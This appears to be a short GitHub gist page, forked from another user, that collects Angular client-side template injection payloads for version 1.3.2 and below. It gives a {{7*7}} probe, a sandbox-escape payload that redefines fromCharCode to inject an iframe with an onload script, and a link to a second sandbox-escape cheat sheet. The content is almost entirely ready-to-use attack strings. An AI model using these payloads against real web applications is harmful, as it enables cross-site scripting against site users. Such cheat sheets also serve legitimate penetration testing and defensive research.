Skip to content

Instantly share code, notes, and snippets.

@ahmed118
ahmed118 / AngularTI.md
Created October 4, 2017 06:24 — forked from mccabe615/AngularTI.md
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
@ahmed118
ahmed118 / angular.sandbox.escapes.md
Created October 4, 2017 06:34 — forked from jeremybuis/angular.sandbox.escapes.md
Angular Sandbox Escape Cheatsheet